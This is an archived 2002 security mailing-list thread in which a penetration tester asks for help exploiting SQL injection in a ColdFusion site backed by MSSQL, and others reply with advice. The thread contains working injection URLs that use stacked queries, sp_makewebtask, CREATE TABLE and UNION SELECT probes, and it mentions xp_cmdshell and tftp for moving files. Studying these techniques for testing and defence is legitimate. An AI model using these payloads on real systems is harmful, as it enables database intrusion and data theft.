you may also want to try: UNION file.cfm?id=4567 UNION SELECT TOP 3 FROM mrro-- or 4 if it is four lines ect. On Fri, 13 Sep 2002 19:04:37 -0700 (PDT) Cesar <cesarc56at_private> wrote: >Hi. >You must use UNION ALL to get all the rows. > >For new techniques take a look a this paper: > >Manipulating MS Sql Server using sql injection. >http://www.appsecinc.com/news/briefing.html#inject > >Cesar. > >--- Mr Ro <vnmrroat_private> wrote: >> hello pen-tester, >> I am dealing with a pen-test agains a CFM server >> with >> MSSQL as backend. It is vulnerable with direct SQL >> injection. >> I figure out that I can create,drop...table, execute >> xp_cmdshell, sp_makewebtask, so i submit: >> submit: >> http://mysite/file.cfm?id=4546;exec sp_makewebtask >> "C:\winnt\temp\blah.htm","select * from >> master..sysmessages"-- >> it's okay, and I want to get >> "C:\winnt\temp\blah.htm". >> I submit: >> http://mysite/file.cfm?id=4567;create table blah >> (line >> varchar(8000))-- >> and then, I submit: >> http://mysite/file.cfm?id=4567 UNION SELECT line >> from >> mrro-- >> it returns an error complain that "All queries in an >> SQL statement containing a UNION operator must have >> an >> equal number of expressions in their target lists." >> so >> I keep adding "line" in my request url >> (http://mysite/file.cfm?id=4567 UNION SELECT >> line,line,line from mrro--), finally it returns an >> error message like this: >> "[Microsoft][ODBC SQL Server Driver][SQL Server]The >> text, ntext, or image data type cannot be selected >> as >> DISTINCT." >> question here: who can explain me what happened ? >> >> I know there is another way to download or upload >> files using "tftp", so is there any free "tftp" >> server >> for me to use instead of installing a new one ? >> thank for reading. >> best regards >> mrro >> >> __________________________________________________ >> Do you Yahoo!? >> Yahoo! News - Today's headlines >> http://news.yahoo.com >> >> >---------------------------------------------------------------------------- >> This list is provided by the SecurityFocus Security >> Intelligence Alert (SIA) >> Service. For more information on SecurityFocus' SIA >> service which >> automatically alerts you to the latest security >> vulnerabilities please see: >> https://alerts.securityfocus.com/ >> > > >__________________________________________________ >Do you Yahoo!? >Yahoo! News - Today's headlines >http://news.yahoo.com > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus Security >Intelligence Alert (SIA) >Service. For more information on SecurityFocus' SIA >service which >automatically alerts you to the latest security >vulnerabilities please see: >https://alerts.securityfocus.com/ > _____________________________ For the best comics, toys, movies, and more, please visit <http://www.tfaw.com/?qt=wmf> ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Wed Sep 18 2002 - 12:25:35 PDT